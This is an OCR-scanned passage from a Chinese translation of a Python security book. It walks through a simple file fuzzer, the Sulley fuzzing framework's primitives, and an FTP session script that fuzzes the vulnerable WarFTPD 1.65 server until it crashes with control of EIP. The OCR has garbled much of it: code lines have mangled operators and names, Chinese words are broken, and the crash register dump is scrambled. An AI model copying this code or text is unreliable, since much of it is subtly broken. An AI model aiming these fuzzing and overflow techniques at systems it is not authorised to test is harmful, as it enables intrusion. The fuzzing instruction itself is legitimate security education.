fuzz file += stream[rand offset:] 
4 Write out the file 
fd = open("test.%s" 96 self.ext, "wb") 
fd.write( fuzz file ) 
fd.close() 
return 


E ay 


这 是 一 个 基础 的 变形 函数 。 我 们 从 全 部 测试 用 例 中 随即 的 选取 一 个 ; 然后 同样 随即 
的 获取 一 个 文件 位 移 和 需要 附加 的 fuzz 数据 的 长 度 。 用 位 移 和 长 度 信息 生成 附加 的 
fuzz 数据 ， 最 后 将 原始 数据 分 片 ， 在 其 中 加 入 fuzz 数据 。 一 切 完成 后 ， 把 新 生成 
的 文件 覆盖 原来 的 文 件 。 紧 接着 就 是 调试 线程 开始 新 一 轮 的 测试 了 。 现 在 让 我 们 实 
现 命令 行 处 理 部 分 。 





4file fuzzer.py 


def print usage(): 


print i perd n 
print "[*] file fuzzer.py -e «Executable Path» -x «File Extens: 
print i asd s 
sys.exit(0) 
if name -- " main ": 


print "[*] Generic File Fuzzer." 
# This is the path to the document parser 
4 and the filename extension to use 
try: 
opts, argo = getopt.getopt(sys.argv[1:], "e:x:n") 
except getopt.GetoptError: 
print usage() 
exe path - None 
ext - None 
notify - False 
for o,a in opts: 


if o == "-e"; 
exe_path = a 

elif o == "-x": 
ext =a 

elif o == "=n"; 


notify = True 

if exe_path is not None and ext is not None: 
fuzzer = file_fuzzer( exe_path, ext, notify ) 
fuzzer.fuzz() 

else: 
print usage() 


EI ay 


现在 我 们 的 file fuzzer py 脚本 已 经 能 够 接收 到 命令 行 参数 了 。-e 标志 指示 需要 
fuzz 的 目标 程序 的 路 径 。-x 选项 是 我 们 需要 用 于 测试 的 文件 的 扩展 名 ; 举 个 例 
子 .txt 就 说 明 我 们 要 用 文本 文件 作为 测试 数据 。-n 选项 告诉 fuzzer 是 否 要 接收 通 
知 。 


最 好 的 测试 fuzzer 的 方法 ， 就 是 在 测试 目标 程序 的 时 候 观 察 数据 的 变形 结果 。 在 
fuzz 文本 文件 的 时 候 ， 用 Windows 记事 本 是 再 好 不 过 的 了 。 因 为 你 能 够 直接 的 看 
到 每 一 次 的 数 据 的 变化 ， 比 用 十 六 进 制 编辑 器 和 二 进 制 对 比 工具 方便 很 多 。 在 和 启动 
file fuzzer.py 脚本 之 前 ， 需 要 在 脚本 当前 目录 下 新 建 两 个 目录 examples 和 
crashes 。 然 后 在 examples 目录 下 存 放 几 个 以 .txt 结尾 的 文件 ， 接 着 使 用 如 下 命 
使 启动 脚本 。 





python file fuzzer.py -e C:NNWINDOWSNNsystem32NNnotepad.exe -x .txl 
了 — Bil] 


随 着 记事 本 的 启动， 你 能 看 到 被 变形 过 的 文件 。 在 对 变形 之 后 的 数据 满意 以 后 ， 你 
就 可 以 使 用 这 个 file fuzzer 测试 别 的 程序 了 。 
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8.3 改进 你 的 Fuzzer 


虽然 我 们 已 经 创建 了 一 个 fuzzer， 而 且 只 要 能 够 给 它 提供 足够 多 的 时 间 ， 它 就 能 找 
出 一 些 pug。 但 是 在 通 往 强 大 的 路 还 很 长 很 长 。 


8.3.1 Code Coverage 


Code coverage 是 一 个 度量 ， 通 过 统计 测试 目标 程序 的 过 程 中 ， 执 行 了 男 数 。 
Fuzzing 专家 Charlie Miller 通过 经 验证 明 ， 寻 找到 的 bug 数量 和 Code coverage 
的 增长 成 正比 。 那 我 们 怎么 证 明 呢 ! 最 简单 的 方法 就 是 ， 在 你 fuzz 目标 程序 的 时 
候 ， 使 用 调试 器 在 目标 进程 上 的 说 有 阔 数 上 设置 断 点 ， 然 后 使 用 不 同 的 测试 案例 去 
fuzz 目标 进程 ， 根 据 找到 bug WE 中 的 函数 数量 ， 你 就 会 知道 自己 的 fuzz 的 效 
率 。 还 有 更 多 的 使 用 Code coverage 的 复杂 的 例 子 ， 你 可 以 将 它 们 的 技术 加 入 你 
的 file fuzzer。 


8.3.2 Automated Static Analysis 


通过 对 二 进 制 文件 进行 Automated Static Analysis( 自动 化 的 静态 分 析 ) 

， 能 够 帮助 bughunter 更 高 效 的 找 出 目标 代码 的 弱点 。 跟 踪 容易 出 错 的 函数 〈 例 
如 strcpy) , HEAR 数 的 执行 过 程 ， 会 有 很 好 的 效果 。 还 有 很 多 别 的 优点 ， 比 
如 跟踪 内 部 的 内 存 拷 贝 操 作 ， 忽 略 不 必要 的 错误 处 理 代 码 ， 等 等 。 对 目标 将 程序 了 
解 的 越 多 ， 找 出 bug 的 机 会 就 越 大 。 


将 这 些 功 能 加 入 我 们 创建 的 fuzzer， 会 很 大 的 提高 我 们 今后 的 工作 效率 。 在 我 们 设 
it fuzzer 的 时 候 扩 展 性 是 非常 重要 的 ， 在 以 后 不 断 的 功能 扩张 中 ， 你 会 感谢 今天 花 
在 前 端 设计 上 的 时 间 ， 是 多 么 的 值得 。 接 下 来 让 我 们 看 看 一 个 基于 Python 的 
fuzzing 框架 (Pedram Amini, Aaron Portnoy of TippingPoint) 。 之 后 我 们 会 深入 
介绍 我 的 一 个 fuzzer 作品 ioctlizer, AF 查找 使 用 了 10 控制 代码 的 Windows Ik 
动 中 的 漏洞 。 


9 SULLEY 


Sulley 名 字 来 起 源 于 电影 《Monsters》， 一 头 毛线 绕 的 蓝 色 怪物 。 下 面 将 要 看 到 的 
Sulley 也 是 一 个 怪物 ， 强 大 的 基于 Python 的 fuzzing 框架 的 怪物 (在 这 里 让 我 们 感 
谢 他 们 : Pedram Amini 和 Aaron Portnoy of TippingPoint) > Sulley 不 仅仅 是 一 个 
fuzzer ; 它 还 有 拥有 优秀 的 月 溃 报 告 ， 自 动 虚 拟 化 技术 (VMWare automation) 。 
在 fuzzing 的 过 程 中 你 可 以 在 任意 时 刻 ， 甚至 是 目标 程序 崩溃 的 时 候 ， 从 新 启动 程 
序 到 前 一 刻 ， 继 续 寻 找 bug 之 旅 。In short, Sulley is badass. 


Sulley 和 SPIKE (一 款 著 名 的 协议 fuzzing 工具 ， 当 然 它 是 免费 的 ) 一 样 使 用 了 数 
据 块 技术 ， 所 以 生成 的 数据 会 更 有 "智慧 "， 不 在 是 一 群 没 头 没 脑 的 苍蝇 。 让 我 们 看 
看 什么 是 基 于 块 的 fuzzing 技术 ， 在 生成 测试 数据 前 ， 你 必须 针对 协议 或 者 是 文件 
格式 ， 完 成 一 个 数据 生成 的 框架 ， 框 架 里 尽 可 能 详细 的 包含 了 协议 (或 者 文件 格 

AX) 的 各 个 字段 ， 数 据 类 型 ， 还 有 长 度 信息 ， 最 后 生成 的 测试 数据 就 会 非常 有 针对 
性 。 让 后 把 这 些 测试 数据 传递 给 负责 协议 测试 的 框架 ， 用 于 fuzzing。 这 项 技术 最 
早 提 出 来 的 目的 就 是 为 了 解决 网 络 协议 fuzz 时 的 盲 目 性 。 举 个 例子 ， 在 网 络 协议 
中 ， 一 般 每 个 字段 都 有 长 度 记 录 ， 如 果 我 们 发 送 的 测试 数据 增 加 了 数据 的 长 度 ， 却 
没有 改变 长 度 记 录 ， 那 服务 端 程序 ， 就 会 根据 长 度 记 录 ， 自 动 抛弃 多 余 的 数据 ， 这 
样 在 fuzzing Wat te, REAR RRM bug 了 。 基 于 块 的 技术 则 是 负责 处 理 这 些 数 据 块 
间 的 关系 的 ， 让 生成 的 数据 更 标准 ， 而 不 是 像 野 变 人 。 


接 下 来 我 们 会 详细 的 讲解 Sully， 从 安装 到 使 用 。 先 是 快速 的 了 解 Sulley 创建 
protocol description (协议 描述 ) 的 基础 知识 。 接 着 再 完成 一 个 包含 ，fuzzing tz 
架 ， 包 捕获 ， 以 及 骨 溃 报告 的 完整 的 fuzzer。 我 们 fuzzing 的 目标 就 是 
WarFTPD， 早 期 的 版 本 存在 栈 浴 出 。 测 试 fuzzer 最 常见 方法 就 是 ， 用 有 漏洞 的 程 
序 喂 它 ， 如 果 它 能 咬 出 一 个 洞 ， 说 明 你 的 fuzzer 还 不 傻 ， 如 果 什 么 都 没 发 现 ， 那 
洗 洗 回去 睡 把 。 这 次 我 们 喂 的 是 个 怪物 ， 如 果 你 还 没有 饲养 手册 ， 可 以 看 看 
Pedram 和 Aaron 写 的 Sulley manual。 好 了 ， 让 我 们 继续 。 


9.1 安 委 Sulley 


在 我 们 深入 探索 Sulley 之 前 ， 先 得 找 一 头 ， 栓 起 来 。 大 家 可 以 从 
http://www.nostarch.com/ghpython.htm FR, zip 打包 的 Sulley 源 代码 。 (我 估计 
是 眼花 ， 悍 是 没 找到 ，http://sulley.googlecode.com 此 地 有 货 ) 。 


下 载 完 成 后 ， 解 压 Sulley， 在 目录 下 找到 sulley, utils 和 requests 文件 夹 ， 然 后 复 
制 到 C:\Python25\Lib\site-packages\ 目 录 下 。 这 些 就 是 Sulley 的 核心 。 接 下 来 EA 
装 其 他 依赖 的 文件 。 


第 一 个 WinPcap， 一 款 开源 的 轻便 简洁 的 网 络 库 ， 用 于 windows 平台 下 的 包 捕 
je Aja 过 嗅 探 的 同学 ， 对 这 东西 应 该 是 非常 熟悉 了 ， 建 议 搞 渗透 的 都 去 看 看 它 的 
手册 ， 大 饼 级 别 的 黑客 利器 。Winpcap 被 广泛 的 应 用 与 各 种 网 络 工具 ， 人 人 侵 检 测 
系统 。 Sulley 使 用 它 捕捉 网 络 数据 。 下 载 地 

HE : http:/www.winpcap.org/instalybin/WinPcap 4 0 2.exe. 


接 下 来 安装 两 个 python 库 : pcapy 和 impacket,， 和 上 面 的 WinPcap 库 配 合 。 它 
们 都 由 CORE Security 提供 。Pcapy 是 WinPcap 的 Python 接口 ，impacket 则 负 
责 包 的 解码 和 创建 。 pcap 的 下 载 地 址 http://oss.coresecurity.com/repo/pcapy- 
0.10.5.win32-py2.5.exe. 


mpacket 的 下 载 地 址 http://oss.coresecurity.com/repo/Impacket-stable.zip。 下 载 完 
后 解压 到 CA directory, 进 入 目录 执行 以 下 命令 : 


C:NImpacket-stableNImpacket-0.9.6.0&gt;C:NPython25*Npython.exe setu[ 
4] = zm 
一 切 就 绕 ， 主 角 登 场 ! 





9.2 Sulley primitives 


在 我 们 开始 开始 对 目标 动手 前 ， 必 须 先 定义 好 所 有 的 building blocks (4834) , 
这 些 块 负责 产生 协议 相关 的 测试 数据 。 Sulley 提供 了 所 需 的 各 种 的 数据 格式 ， 为 
我 们 创建 简 和 单 高 效 的 protocol descriptions 提供 了 便利 。 这 些 单独 的 数据 组 件 叫 做 
primitives ( 原 语 ) 。 我 们 先 简短 讲解 一 些 fuzz WarFTPD 时 候 会 用 到 的 
primitives。 一 旦 你 理解 了 如 何 使 用 其 中 一 个 primitives， 那 剩 下 的 就 很 容易 了 。 


9.2.1 Strings 
A Eee primitives。 到 处 都 有 字符 串 ; APA, ip thit, Bx 


s_string() 指 令 表 示 添 加 进 测试 数据 的 primitives 是 一 个 可 fuzz 的 字符 串 。 
s_string() 只 有 一 个 参数 ,就 是 有 效 的 字符 串 ， 用 于 协议 交互 中 的 正常 输入 。 比 如 ， 
你 fuzzing 一 个 email 地 址 : 


s string("justinQimmunityinc.com) 


Sulley 会 把 justin@immunityinc.com 当 作 一 个 有 效 值 ， 然 后 进行 各 种 变形 ， 最 后 扎 
给 目 标 程序 。 让 我 们 看 看 email 地 址 变 成 了 什么 样 。 


justin@immunityinc . comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA 
justin@%n%n%n%n%n%n . com 
?6d96d96d immunityinc.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA 


BLE Uo 
9.2.2 Delimiters 


Delimiters( 定 界 符 )， 用 于 将 大 的 字符 串 分 割 成 晓得 容易 管理 的 片段 。 还 是 用 先前 的 
email 地 址 做 例子 ， 用 s_delim() 指 邻 能 够 将 它 分 割 成 更 多 的 fuzz 字符 串 。 


s string("justin") 

s delim("Q") 
string("immunityinc") 

s delim(".",fuzzable-False) 
S string("com") 


S 


通过 s_delim()， 我 们 将 email 地 址 分 成 了 几 个 子 串 ， 并 且 告 诉 Sulley， 我 们 在 
fuzzing 的 时 候 不 使 用 点 (.)， 但 是 会 使 用 @ 。 


9.2.3 Static and Random Primitives 


s static()&] s_random()， 顾 名 思 义 ， 第 一 个 使 传人 的 数据 不 改变 ， 第 二 个 使 数据 
随机 的 改变 。 


s static("Hello,world!") 
S static( Nx41Nx43 x41) 


s_random() 可 以 随机 产生 变 长 的 数据 。 


s random("Justin",min length-z6, max length-256, num mutations-10) 


‘| um EHE mJ 





min length 和 max length 告诉 Sully 变形 后 的 数据 的 长 度 范围 ， num_mutations 
为 可 选 参数 ， 表 示 变 形 的 次 数 ， 默 认为 25 次 。 


在 我 们 的 例子 ， 使 用 "Justin" 作 为 源 数 据 ， 经 过 10 次 变形 ， 产 生 6-256 个 长 度 的 字 


o 


9.2.4 Binary Data 


Binary Data( 二 进 制 数据 ) 是 数据 表示 中 的 瑞士 军刀 。Sullyey 几乎 能 处理 所 有 二 进 制 
数 据 。 当 我 们 在 处 理 一 些 未 知 协议 的 数据 包 的 时 候 ， 你 也 许 只 是 想 看 看 服务 器 是 如 
何 回 应 我 们 生成 的 这 些 没 有 意义 的 数据 的 ， 这 时 候 s_binary() 就 非常 有 用 了 


s binary("0x00 \\x41\\x42\\x43 Od Oa Od Oa") 
Sully 能 识别 出 所 有 这 类 的 数据 ， 然 后 像 将 它们 当 作 字符 串 使 用 。 


9.2.5 Integers 


Integers( 整 数 ) 的 应用 无 处 不 在 ， 从 能 看 的 见 的 明文 数据 ， 到 看 不 见 的 二 进 制 协 议 ， 
以 及 数据 长 度 ， 各 种 结构 ， 等 等 。 


表 9-1 列 出 了 Sulley 支持 的 主要 几 种 整数 类 型 。 


1 byte - s byte(), s char() 

2 bytes - s word(), s short() 

4 bytes - s dword(), s long(), s int() 
8 bytes - s qword(), s double() 


Listing 9-1: Sulley 支持 的 整数 类 型 

所 有 的 整数 表达 式 都 有 几 个 重要 的 的 选项 。endian 项 表示 整数 将 以 什么 样 的 形式 变 
现 出 来 ， 是 小 端 - (<) 还 是 Aim- (>) 格 式 | 黑 认 似乎 小 端 。format 项 有 两 个 可 选 

值 ，ascii 和 binary; 代表 整数 将 被 如 何 使 用 。 举 个 例子 ， 如 果 你 有 一 个 用 ASCII 


格式 表示 是 1， 用 binary 表示 就 是 X31。signed 项 说 明 整 数 是 有 符号 的 还 是 无 符 
号 的 ， 这 个 选项 只 有 在 format 指定 为 ascii 后 有 效 ， 默 认 似乎 False。 最 后 一 个 有 
趣 的 选项 是 full_range， 启 用 这 个 选项 以 后 ，Sulley 就 会 在 一 个 很 广 的 范围 内 枚 举 
可 能 的 整数 值 。 举 个 例子 ， 如 果 我 们 传人 的 整数 是 一 个 无 符号 的 整数 ， 把 

full range 设置 成 True， 这 时 候 Sulley 就 会 很 智能 的 测试 边界 值 (接近 或 者 超过 最 
大 值 ， 或 者 接近 最 小 值 )， 无 符号 的 最 大 值 是 65535，Sulley 就 会 试 着 使 用 65534, 
65535, 65536 去 进行 测试 。full_range 默认 为 False， 因 为 可 枚 举 的 时 间 可 是 很 长 
的 。 看 看 下 面 的 例子 。 


s word(0x1234, endian=">", fuzzable-False) 
s dword(OxDEADBEEF, format="ascii", signed-True) 


第 一 个 例子 ， 我 们 设置 了 一 个 2 字 节 大 小 的 值 0x1234， 并 且 将 表示 方式 设置 成 大 
端 ， 同 时 作为 一 个 静态 值 。 第 二 个 例子 ， 我 们 设置 了 一 个 4 SH (WE) 大 小 的 值 
OxDEADBEEF, 并 且 将 它 作 为 有 符号 的 整数 ， 以 ASCII 形式 表现 。 


9.2.6 Blocks and Groups 


Blocks( 块 )Groups( 组 ) 是 Sulley 提供 的 强大 的 组 织 工 具 。Blocks 将 独立 的 
primitives 组 装 成 一 个 的 有 序 的 块 。Groups 中 包含 了 一 些 特定 的 primitives， 一 个 
Group 和 一 个 Block 结合 后 ， 每 次 fuzzer 调用 Block 的 时 候 ， 都 会 将 Group 中 的 
数据 循环 的 取出 ， 组 成 不 同 的 Block。 


下 面 就 是 一 个 使 用 块 和 组 fuzzing HTTP 的 例子 。 


# import all of Sulley's functionality. 
from sulley import * 
# this request is for fuzzing: {GET,HEAD, POST, TRACE} /index.html H7 
# define a new block named "HTTP BASIC". 
s initialize("HTTP BASIC") 
# define a group primitive listing the various HTTP verbs we wish 1 
s group("verbs", values-["GET", "HEAD", "POST", "TRACE"]) 
# define a new block named "body" and associate with the above grot 
if s block start("body", group="verbs"): 

# break the remainder of the HTTP request into individual prim: 


s delim(" ") 

s delim("/") 

s string("index.html") 
s delim(" ") 

s string("HTTP") 

s delim("/") 
s-string( 4) 

s delim(".") 


s_string("1") 
# end the request with the mandatory static sequence. 
s_static("\r\n\r\n") 
# close the open block, the name argument is optional here. 
s block end("body") 


= — — —H 


程序 一 开始 我 们 就 定义 了 一 个 叫 verbs 的 组 ， 其 中 包含 了 所 有 HTTP 请 求 类 型 。 之 
后 定 义 了 一 个 叫 body 的 块 ， 并 且 和 verbs 组 绑 定 。 这 意味 着 ， 以 后 Sulley HRA 
用 body 内 的 变 形 数据 的 时 候 ， 都 会 循环 的 获取 (GET, HEAD, POST, TRACE)5 种 
请 求 方 式 ， 这 样 一 来 ， 一 次 body 内 的 变形 就 相当 于 产生 5 个 不 同 的 body. 


到 目前 为 止 ， 我 们 已 经 讲解 完了 Sulley 的 基础 知识 。 当 然 Sulley 不 仅仅 如 此 ， 还 
A 据 解码 ， 校 验 和 计算 ， 长 度 自动 处 理 等 等 。 想 深入 学 习 的 同学 可 以 看 Pedram 
写 的 Fuzzing: Brute Force Vulnerability Discovery (Addison-Wesley 2007)， 一 本 
综合 了 Sulley 和 fuzzing 相 关 技术 的 好 书 。 现 在 该 开始 对 WarFTPD FET. RM 
要 先 创 建 自己 的 primitive 集合 ， 然 后 


将 它们 传 给 负责 构建 测试 的 框架 内 。 





9.3 猎 杀 WarFTPD 


在 我 们 已 经 学 会 了 如 何 使 用 Sulley primitives &J& protocol description( 协 议 说 明 ) 之 
后 。 现在 可 以 拿 个 东西 试 试 手 了 。 这 次 的 目标 就 是 WarFTPD 1.65。 问 题 出 在 
USER 和 PASS 命 今 身 上 ， 向 他 们 传递 过 长 的 数据 ， 就 会 引发 栈 洽 出。 这 种 漏洞 
很 典型 ， 出 现 问题 的 地 方 结构 也 很 清晰 ， 作 为 入 手 的 case 再 好 不 过 。 先 
从 
ftp://ftp.jgaa.com/pub/products/Windows/WarFtpDaemon/1.6_Series/ward165.exe 
下 载 程序 。 在 当前 目录 解压 子 之 后 ， 直 接 运 行 warftpd.exe 就 能 启动 FTP 服务 

了 。 在 使 用 Sulley 书写 协议 说 明之 前 ， 让 我 们 先 了 解 下 FTP 协议 的 工作 流程 。 


9.3.1FTP 101 


FTP 是 一 个 简单 轻便 的 文件 传输 协议 ， 被 广泛 的 使 用 于 各 种 环境 中 ， 从 Web 服务 
器 到 网 络 打 印 机 。FTP 服务 器 默认 在 端口 21 上 监听 客户 端 发 送 的 命令 。 现 在 我 们 
要 冒充 成 FTP 客户 端 ， 向 服务 器 发 送 变形 过 的 命令 数据 ， 党 试 获得 服务 器 的 权 
限 。 如 果 你 顺利 完成 了 WarFTPD 的 fuzzer, 别 忘 了 用 它 去 寻找 新 的 倒 霍 蛋 。 
一 个 FTP 服务 器 既 可 以 设置 成 不 需要 密码 的 匿名 访问 或 者 是 需要 密码 的 认证 访 


问 。 因 为 WarFTPD 的 漏洞 出 在 USER 和 PASS 命 信 上， 所 以 我 们 就 假定 服务 区 
使 用 认证 访问 。FTP 认证 命令 的 格式 如 下 : 


USER <USERNAME> PASS <PASSWORD> 


一 旦 客户 端 传 入 了 有 效 的 用 户 名 和 密码 后 ， 服 务 器 就 会 赋予 客户 端 ， 传 输 文件 ， 改 
变 目 录 ， 查 询 文 件 等 各 种 权限 。 当 然 USER 和 PASS 命令 只 是 FTP 服务 器 提供 的 
功能 中 的 一 个 子 集 ， 在 认证 成 功 后 还 有 很 多 别 的 功能 ， 如 表 9-2。 这 些 新 的 命令 都 
要 加 入 到 我 们 程序 的 协 议 框 架 (protocol skeleton) 中 。FTP 协议 详细 的 命令 ， 请 看 
rfc959, 


CWD <DIRECTORY> - change working directory to DIRECTORY 

DELE <FILENAME> - delete a remote file FILENAME 

MDTM <FILENAME> - return last modified time for file FILENAME 
MKD <DIRECTORY> - create directory DIRECTORY 


Listing 9-2: 我 们 要 额外 fuzz 的 FTP MA 


命令 列表 虽然 不 够 详细 ， 但 还 扩大 了 测试 的 范围 ， 现 在 让 我 们 动手 把 它们 写成 
protocol description 


9.3.2 创建 FTP 协议 框架 
学 以 致 用 ， 学 以 致 用 啊 | 


#ftp. py 

from sulley import * 
s initialize("user") 
s static("USER") 

s delim(" ") 

s string("justin") 
s_static("\r\n") 

s initialize("pass") 
S static("PASS") 

s delim(" ") 

s string("justin") 
s_static("\r\n") 

s initialize("cwd") 
s static("CWD") 

s delim(" ") 
s_string("c: ") 
s_static("\r\n") 
s_initialize("dele") 
s_static("DELE") 
s_delim(" ") 
s_string("c:\\test.txt") 
s_static("\r\n") 
s_initialize("mdtm") 
s static("MDTM") 

s delim(" ") 

s string("C:NNboot.ini") 
s_static("\r\n") 
s_initialize("mkd") 
s static("MKD") 

s delim(" ") 

s string("C:NNTESTDIR") 
s_static("\r\n") 


protocol skeleton 完成 之 后 ， 让 我 们 开始 创建 Sulley 会 话 ， 把 所 有 的 请 求 信 息 连 起 
来 ， 同时 启动 网 络 嗅 探 和 客户 端 调试 。 


9.3.3 Sulley 会 话 


Sulley 会 话 包 含 了 请 求 数据 整合 ， 网 络 数据 包 的 捕捉 ， 进 程 调试 ， 月 溃 报 告 ， 和 虚 
拟 机 控制 。 先 让 我 们 定义 一 个 会 话 文件 ， 然 后 详细 的 分 析 每 个 部 分 。 


Hftp session.py 

from sulley import * 

from requests import ftp # this is our ftp.py file 

def receive ftp banner(sock): 
sock.recv(1024) sess = sessions.session(session filename-'audi! 
target - sessions.target("192.168.244.133", 21) 
target.netmon - pedrpc.client("192.168.244.133", 26001) 
target.procmon - pedrpc.client("192.168.244.133", 26002) 
target.procmon options = ( "proc name" : "war-ftpd.exe" } 
4 Here we tie in the receive ftp banner function which receive: 
# a socket.socket() object from Sulley as its only parameter 
sess.pre send - receive ftp banner sess.add target(target) 
sess.connect(s get("user")) 
sess.connect(s get("user"), s get("pass")) 
sess.connect(s get("pass"), s get("cwd")) 
sess.connect(s get("pass"), s get("dele")) 
sess.connect(s get("pass"), s get("mdtm")) 
sess.connect(s get("pass"), s get("mkd")) 
sess.fuzz() 


| = Um 


receive ftp_banner() 是 必须 的 ， 因 为 每 个 FTP 服务 器 在 客户 端 连接 上 的 时 候 ， 都 
会 发 送 banner( 标 识 )。 我 们 将 它 和 sess.pre_send 绑 定 起 来 ， 这 样 Sulley 发 送 
fuzzing 数据 前 的 时 候 就 会 先 接收 FTP banner。 和 receive_ftp_banner 一 样 ， 

pre send 也 只 接收 一 个 由 Sulley 传递 的 sock 对 象 。 第 一 步 我 们 创建 一 个 会 话 文 
件 ， 用 于 记录 当前 fuzzer 的 状态 ， 同 时 控制 fuzzing 的 启动 和 停止 。 第 二 部 定义 攻 
击 的 上 目标， 包括 IP 地 址 和 端口 号 。 这 里 设置 成 192.168.244.133 端口 21 (这 是 我 
们 运行 WarFTPD 虚拟 机 的 IP) 。 第 三 步 ， 设 置 网 络 噢 探 的 端口 为 26001，IP 地 
址 和 FTP 服务 器 的 地 址 一 样 ， 这 个 端口 用 于 接受 Sulley 发 出 的 命令 。 第 四 步 ， 设 
置 调 试 器 监听 的 端口 26002， 这 个 端口 用 于 接收 Sulley 发 出 的 调试 命令 。 
procmon_options 选项 告诉 调试 器 我 们 关注 的 进程 是 war-ftpd.exe。 第 六 步 ， 在 会 
话 中 加 入 定义 好 的 目标 对 象 。 第 七 步 ， 将 FTP 请 求 指令 有 序 的 组 织 好 。 先 是 认 
证 ， 然 后 将 操作 指令 和 需要 的 密码 成 对 传人 。 最 后 启动 Sulley 开始 fuzzing。 


现在 我 们 定义 好 了 会 话 ， 组 织 好 了 请 求 指令 。 只 剩 下 网 络 和 监控 脚本 的 设置 了 。 当 
这 一 切 都 完成 的 时 候 ， 就 可 以 去 捕捉 我 们 的 猎物 了 。 





9.3.4 网 络 和 进程 监控 


Sulley 的 优点 之 一 就 是 能 非常 好 的 跟踪 fuzz 期 间 的 数据 交互 ， 以 及 目标 系统 的 月 溃 
信息。 这 样 我 们 就 能 在 第 一 时 间 内 分 析出 引起 目标 前 淡 的 数据 包 ， 然 后 快速 的 开发 
出 exploit。 


在 Sulley 的 主 目录 下 可 以 找到 process_monitor.py 和 network_monitor.py 两 个 脚 
本 ， 他 们 分 别 负 责 网 络 监控 和 进程 监控 。 


python process monitor.py 

Output: 

ERR» USAGE: process monitor.py 

«-c|--crash bin FILENAME» filename to serialize crash bin class to 

[-pl--proc name NAME] process name to search for and attach to [-i 
target process 

[-1|--log level LEVEL] log level (default 1), increase for more 
verbosity 

[--port PORT] TCP port to bind this agent to 


‘| =p 
如 下 启动 进程 监控 。 








python process monitor.py -c C:Nwarftpd.crash -p war-ftpd.exe 


提示 :我 们 已 经 设置 了 默认 的 监听 端口 26002， 所 以 不 用 -p 选项 。 


接 下 来 看 看 network_monitor.py。 在 这 之 前 需要 安装 以 下 的 库 : WinPcap 4.0, 
pcapy, mpacket, 


python network monitor.py Output: 

ERR» USAGE: network monitor.py 

«-d|--device DEVICE #> device to sniff on (see list below) 
[-f|--filter PCAP FILTER] BPF filter string 

[-P|--log path PATH] log directory to store pcaps to 

[-1|--log level LEVEL] log level (default 1), increase for more vei 
[--port PORT] TCP port to bind this agent to 

Network Device List: 

[0] NDeviceNNPF GenericDialupAdapter 

[1] {83071A13 -14A7 -468C -B27E-24D47CB8E9A4} 192.168.244.133 


SSS SSS ae 





在 这 里 我 们 需要 使 用 第 一 个 网 络 接口 。 如 下 启动 网 络 监控 。 python 
network monitor.py -d 1 -f "src or dst port 21" -P C:\pcaps\ 提示 : 在 启动 之 前 必须 
先 建立 C:\pcaps 目录 。 


一 切 就 绪 ， 开 始 猎 食 。 


9.3.5 fuzzing 和 Web 界面 


现在 我 们 启动 Sulley， 并 使 用 内 置 的 Web 界面 观察 整个 fuzz 过 程 。 


python ftp session.py 


输出 如 下 : 


[07:42.47] current fuzz path: -» user 
[07:42.47] fuzzed 0 of 6726 total cases 
[07:42.47] fuzzing 1 of 1121 

[07:42.47] xmitting: [1.1] 

[07:42.49] fuzzing 2 of 1121 

[07:42.49] xmitting: [1.2] 

[07:42.50] fuzzing 3 of 1121 

[07:42.50] xmitting: [1.3] 


如 果 输 出 是 这 样 的 ， 说 明 一 切 正常 。Sulley 正在 繁忙 的 工作 着 。 现 在 让 我 们 看 看 
web 界面 ， 它 会 提供 更 多 信息 。 


用 浏览 器 打开 http://127.0.0.1:26000 ， 将 看 到 类 似 图 9-1 的 结果 。 


Sulley Fuzz Control 


Total; 29 01 6,7276 | 
user: 29 001 7,12" [= 
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Figure 9-1: Sulley 的 web 界面 


ANT BY Rel Sr x] V, Ss LB 8 看 到 当前 fuzzing 的 进程 ， 以 及 正在 使 用 的 primitive, 30] 
9-1 你 会 看 到 正在 fuzzing 的 primitive 是 user， 这 个 命令 存在 漏洞 ， 在 不 久之 后 就 
会 看 到 如 图 9-2 的 崩溃 报告 。 


Sulley Fuzz Control 


Total: 239 of 6,726 [== 


Cass Cras Synupets 





Figure 9-2: Sulley web RA E WAAR 


很 好 ， 应 该 说 非常 好 ! 我 们 已 经 成 功 的 Crash 了 WarFTPD, Sulley 也 捕捉 到 了 所 
有 相关 的 信息 。 我 们 看 到 两 个 测试 用 例 的 错误 信息 都 是 不 能 反 汇 编 0X5c5c5c5c 这 
个 地 址 。0x5c 就 是 ASCI 字符 \， 这 是 由 于 传人 的 \ 字 符 过 多 ， 履 盖 了 别 的 内 存 区 
域 ， 紧 接 这 影响 到 EIP。 当 调试 器 党 vua red sli. 的 时 候 ， 就 会 失败 ， 
因为 0x5c5c5c5c 不 是 一 个 有 效 的 地 址 。 这 意味 我 们 已 经 能 够 控制 EIP 了 ， 那 接 下 
来 就 是 开发 exploit T ! 激动 吗 ? 呵呵 ， 可 异 c ERO Ow, 不 过 有 
了 这 次 成 功 的 测试 ， 我 们 对 Sulley 的 工作 方式 已 经 很 熟悉 了 ， 对 于 别 的 fuzzing 对 
象 也 只 要 依 葫芦 画 标 就 行 了 。Good Luck! 


现在 点 击 test case 的 数字 ， 就 会 看 到 详细 的 崩溃 信息 。 如 表 9-3 PyDbg 崩溃 信息 
格式 在 60 页 的 "访问 违例 处 理 程序 "中 有 详细 的 讲解 。 忘 记 的 返回 去 看 看 。 


[INVALID]:5c5c5c5c Unable to disassemble at 5c5c5c5c from thread 2: 
when attempting to read from 0x5c5c5c5c CONTEXT DUMP 


EIP: 
EAX : 
EBX: 
ECX: 
EDX: 
EDI: 
ESI: 


5C5C5C5C 
00000001 
5f4a9358 
00000001 
00000000 
00000111 
008a64f0 


Unable to disassemble at 5c5c5c5c 


( 1) -> N/A 


(1598722904) -> N/A 


( 1) -> N/A 
0) -> N/A 


273) -> N/A 


EBP: 00a6fb9c 
ESP: 00a6fb44 
192 .168 .244 .12 


9069808) -> PC (heap) 
10943388) -> BXJ N'CDQU-Q QN-Q QNsA QNOGrA QN*A 9 ( 
10943300). c "SS excmir User from 





( 
( 
( 
8 logged out (stack) 
( 
( 
( 
( 
( 
( 


+00: 5c5c5c5c 741092396) -> N/A 
+04: 5c5c5c5c 741092396) -> N/A 
+08: 5c5c5c5c 741092396) -> N/A 
TOC: 5C5C5C5C 741092396) -> N/A 
+10: 20205c5c 538979372) -> N/A 
+14: 72746e63 (1920233059) -> N/A 


到 


disasm around: 
@x5c5c5c5c Unable to disassemble 
stack unwind: 

war -ftpd.exe:0042e6fa 
MFC42.DLL:5f403d0e 
